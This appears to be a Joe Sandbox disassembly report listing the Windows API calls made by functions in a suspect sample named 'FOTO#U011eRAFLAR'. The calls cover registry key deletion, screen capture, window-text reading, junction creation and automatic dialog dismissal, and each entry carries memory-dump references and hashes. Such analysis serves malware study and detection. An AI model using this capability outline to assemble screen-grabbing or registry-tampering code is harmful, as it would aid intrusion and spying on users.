                                                                        • Part of subcall function 00D9C8BF: _wcslen.LIBCMT ref: 00D9C9C5
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9B61B
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D9B699
                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00D9B731
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00D9B7A5
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00D9B7C3
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00D9B819
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D9B82B
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D9B849
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00D9B8AA
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9B8BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 146587525-4033151799
                                                                      • Opcode ID: 6e4260f9dba3e84214d9cccfbae3ead06586e62739ec21ad7547e9f90aaa7be6
                                                                      • Instruction ID: a40bc28395d2e2890af64c3d34047e1785dc8391f1f42385c9dc7dc4051e1375
                                                                      • Opcode Fuzzy Hash: 6e4260f9dba3e84214d9cccfbae3ead06586e62739ec21ad7547e9f90aaa7be6
                                                                      • Instruction Fuzzy Hash: 3DC18C30204201AFDB10DF14D584B6ABBE5EF85328F19859DE4998B3A2CB71E885CBA1
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00D924FF
                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00D9250F
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00D9251B
                                                                      • SelectObject.GDI32(00000000,?), ref: 00D92528
                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00D92594
                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00D925D3
                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00D925F7
                                                                      • SelectObject.GDI32(?,?), ref: 00D925FF
                                                                      • DeleteObject.GDI32(?), ref: 00D92608
                                                                      • DeleteDC.GDI32(?), ref: 00D9260F
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00D9261A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 617f8225528f7483ad0ea1565f403301d46a69384229068b5e2fdf1f45e1d7ef
                                                                      • Instruction ID: 15e3080c3a88b9702b311f1188ae8dd2bbc3570cebdc03d2d89f4f77339c2db4
                                                                      • Opcode Fuzzy Hash: 617f8225528f7483ad0ea1565f403301d46a69384229068b5e2fdf1f45e1d7ef
                                                                      • Instruction Fuzzy Hash: 2561B175E00219EFCF04CFA8D884AAEBBB5FF48710F248529E955A7250E774A9418FA4
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 00D4DA41
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D5F9
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D60B
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D61D
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D62F
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D641
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D653
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D665
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D677
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D689
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D69B
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D6AD
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D6BF
                                                                        • Part of subcall function 00D4D5DC: _free.LIBCMT ref: 00D4D6D1
                                                                      • _free.LIBCMT ref: 00D4DA36
                                                                        • Part of subcall function 00D42958: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000), ref: 00D4296E
                                                                        • Part of subcall function 00D42958: GetLastError.KERNEL32(00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000,00000000), ref: 00D42980
                                                                      • _free.LIBCMT ref: 00D4DA58
                                                                      • _free.LIBCMT ref: 00D4DA6D
                                                                      • _free.LIBCMT ref: 00D4DA78
                                                                      • _free.LIBCMT ref: 00D4DA9A
                                                                      • _free.LIBCMT ref: 00D4DAAD
                                                                      • _free.LIBCMT ref: 00D4DABB
                                                                      • _free.LIBCMT ref: 00D4DAC6
                                                                      • _free.LIBCMT ref: 00D4DAFE
                                                                      • _free.LIBCMT ref: 00D4DB05
                                                                      • _free.LIBCMT ref: 00D4DB22
                                                                      • _free.LIBCMT ref: 00D4DB3A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 596682c68921a8b23811258707b452373cfb192eda1ddb612c33ff9d62a17b22
                                                                      • Instruction ID: bd53d400b71a89cceb2ea856ad2d14e0224ad463cebd46a994af445f81861b0f
                                                                      • Opcode Fuzzy Hash: 596682c68921a8b23811258707b452373cfb192eda1ddb612c33ff9d62a17b22
                                                                      • Instruction Fuzzy Hash: 3C3139726447469FEB21AA38D84AB6A73EAFB10310F58481AF459D7151DF31ED81CB30
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00D735DF
                                                                      • _wcslen.LIBCMT ref: 00D735EA
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D736DA
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00D7374F
                                                                      • GetDlgCtrlID.USER32(?), ref: 00D737A5
                                                                      • GetWindowRect.USER32(?,?), ref: 00D737CA
                                                                      • GetParent.USER32(?), ref: 00D737E8
                                                                      • ScreenToClient.USER32(00000000), ref: 00D737EF
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00D73869
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D738A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                      • String ID: %s%u
                                                                      • API String ID: 4010501982-679674701
                                                                      • Opcode ID: aec1cd4d0e20f0e84489eb951419cf0c6240c12c6fb4f3c1b38b74a4b76c4008
                                                                      • Instruction ID: 8f95b3a36b4a9368902510b6ccea1f6d062b5a03df9b30e7ceb1632514603b63
                                                                      • Opcode Fuzzy Hash: aec1cd4d0e20f0e84489eb951419cf0c6240c12c6fb4f3c1b38b74a4b76c4008
                                                                      • Instruction Fuzzy Hash: 3DA19E71204706AFD718DF64C885BAAB7A8FF44350F048529F99ED2191EB30EA45DBB1
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00D748DC
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D74922
                                                                      • _wcslen.LIBCMT ref: 00D74933
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00D7493F
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00D74974
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00D749AC
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D749E9
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00D74A37
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00D74A71
                                                                      • GetWindowRect.USER32(?,?), ref: 00D74AE1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 1311036022-1241985126
                                                                      • Opcode ID: a9d67982f087f6eec154dc853636767a7afdd6ce5aeef9b616734744ed70b5cf
                                                                      • Instruction ID: 573e444484d944e50f103c95f59aff02222436cd8234f61a0abcc83422c15f52
                                                                      • Opcode Fuzzy Hash: a9d67982f087f6eec154dc853636767a7afdd6ce5aeef9b616734744ed70b5cf
                                                                      • Instruction Fuzzy Hash: 2E91D1711043059FDB06CF24D985BAAB7E9FF84314F08846AFD899A196EB30ED45CBB1
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00D9CB8B
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00D9CBB4
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00D9CC6F
                                                                        • Part of subcall function 00D9CB5B: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00D9CBD1
                                                                        • Part of subcall function 00D9CB5B: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00D9CBE4
                                                                        • Part of subcall function 00D9CB5B: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D9CBF6
                                                                        • Part of subcall function 00D9CB5B: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00D9CC2C
                                                                        • Part of subcall function 00D9CB5B: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00D9CC4F
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D9CC1A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2734957052-4033151799
                                                                      • Opcode ID: e1aa8ee0f1df80472bd147672a94c1b6b5168331bdd67c1136f6404a8c820221
                                                                      • Instruction ID: b41a018d7f0a5f7ac84bb88c636d62d2a3250d70820b6b4cd045a9b384fae11b
                                                                      • Opcode Fuzzy Hash: e1aa8ee0f1df80472bd147672a94c1b6b5168331bdd67c1136f6404a8c820221
                                                                      • Instruction Fuzzy Hash: AB318F71A11229BBDB208B51DC88EFFBBBCEF06750F041065F806E3241DB309E459AB0
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D83C5E
                                                                      • _wcslen.LIBCMT ref: 00D83C8B
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D83CBB
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D83CDC
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00D83CEC
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00D83D73
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D83D7E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D83D89
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 1149970189-3457252023
                                                                      • Opcode ID: 76a44fd8a3584a0b63d65871bae3a9c5d18588ff12fe0b90364cef55ef31f217
                                                                      • Instruction ID: 7c1e621da9746cf9504b2fd3eba6f28553295d412c76996474a0923a056d79fc
                                                                      • Opcode Fuzzy Hash: 76a44fd8a3584a0b63d65871bae3a9c5d18588ff12fe0b90364cef55ef31f217
                                                                      • Instruction Fuzzy Hash: DB31A676900219ABDB219FA0DC49FEB37BDEF89B50F1441B5F909E2160EB7497448B34
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00D7E5D2
                                                                        • Part of subcall function 00D2E465: timeGetTime.WINMM(?,?,00D7E5F2), ref: 00D2E469
                                                                      • Sleep.KERNEL32(0000000A), ref: 00D7E5FF
                                                                      • EnumThreadWindows.USER32(?,Function_0006E583,00000000), ref: 00D7E623
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D7E645
                                                                      • SetActiveWindow.USER32 ref: 00D7E664
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D7E672
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00D7E691
                                                                      • Sleep.KERNEL32(000000FA), ref: 00D7E69C
                                                                      • IsWindow.USER32 ref: 00D7E6A8
                                                                      • EndDialog.USER32(00000000), ref: 00D7E6B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: c010353fe7c068073d8f5c0635245f3f6ecde61a3f04a6670ac7ccf191bb7830
                                                                      • Instruction ID: 1544012d5989a82688f88936a300d02bd91088afdf092d66d6f54a6ced914239
                                                                      • Opcode Fuzzy Hash: c010353fe7c068073d8f5c0635245f3f6ecde61a3f04a6670ac7ccf191bb7830
                                                                      • Instruction Fuzzy Hash: 44216270210344AFEB116F20ECC9B393B6DF75A355B08A959F91DC63B1EBB1AC009A74
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D7E97B
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D7E991
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D7E9A2
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D7E9B4
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D7E9C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2420728520-1007645807
                                                                      • Opcode ID: d438a080b2be73b833ecef1163ce12471c7d9672715adee94c3a8ba2b145c948
                                                                      • Instruction ID: 5baaab6c409f2f19fddd190611f6ad45cb75ae2f8a1932d810ccda4c56ee84b8
                                                                      • Opcode Fuzzy Hash: d438a080b2be73b833ecef1163ce12471c7d9672715adee94c3a8ba2b145c948
                                                                      • Instruction Fuzzy Hash: C9116022A9025979D710B7A59C59EFF6B7CEBD6B00F04042AB501A21D5EF709988C9B0
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00D75C38
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00D75C51
                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00D75CAF
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00D75CBF
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00D75CD1
                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00D75D25
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00D75D33
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00D75D45
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00D75D87
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00D75D9A
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D75DB0
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00D75DBD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 8f1e47c620439cd353f33f64ef9d79ac963135d489868a0113d183f9eee88882
                                                                      • Instruction ID: 6ae31e14157fee14d92d2677425fe875c7ae99830a0eefbfe3c7e801569133c6
                                                                      • Opcode Fuzzy Hash: 8f1e47c620439cd353f33f64ef9d79ac963135d489868a0113d183f9eee88882
                                                                      • Instruction Fuzzy Hash: 56510071A10705AFDF18CF68DD89AAEBBB5FB49310F148129F919E6294E7709D00CB61
                                                                      APIs
                                                                        • Part of subcall function 00D2A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D2A15D,?,00000000,?,?,?,?,00D2A12F,00000000,?), ref: 00D2A53A
                                                                      • DestroyWindow.USER32(?), ref: 00D2A1F6
                                                                      • KillTimer.USER32(00000000,?,?,?,?,00D2A12F,00000000,?), ref: 00D2A290
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00D673C6
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D2A12F,00000000,?), ref: 00D673F4
                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D2A12F,00000000,?), ref: 00D6740B
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D2A12F,00000000), ref: 00D67427
                                                                      • DeleteObject.GDI32(00000000), ref: 00D67439
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: e1d148f7e9af6e15ca483b300ea11bd254814c1898ec6551ef54f0715baf362e
                                                                      • Instruction ID: 76aa018a0b2773e9ccc784f72160cbedb4e586027137264be4ddfb8921e2f2bd
                                                                      • Opcode Fuzzy Hash: e1d148f7e9af6e15ca483b300ea11bd254814c1898ec6551ef54f0715baf362e
                                                                      • Instruction Fuzzy Hash: 0F619F35604724DFCB229F18ED88B297BF1FF5432AF191518E0928B660C771A990DF72
                                                                      APIs
                                                                        • Part of subcall function 00D2ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D2ADD2
                                                                      • GetSysColor.USER32(0000000F), ref: 00D2ACE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 7299caaae884b0aac98ec85938c6323d528bdaec0c9d5e9a155817efbc2127b1
                                                                      • Instruction ID: e3480163353c4d1a54379a3a581d7694d14e6e8883ebf88cb9a75e41beba0903
                                                                      • Opcode Fuzzy Hash: 7299caaae884b0aac98ec85938c6323d528bdaec0c9d5e9a155817efbc2127b1
                                                                      • Instruction Fuzzy Hash: 2141A171104754AFDB205B2CEC48BB937A5EB2237AF184645F9A28B2E2D7319C42DB31
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00D603D3,?,0000138C,?,?,?,?,00000000,?), ref: 00D79635
                                                                      • LoadStringW.USER32(00000000,?,00D603D3,?), ref: 00D7963E
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
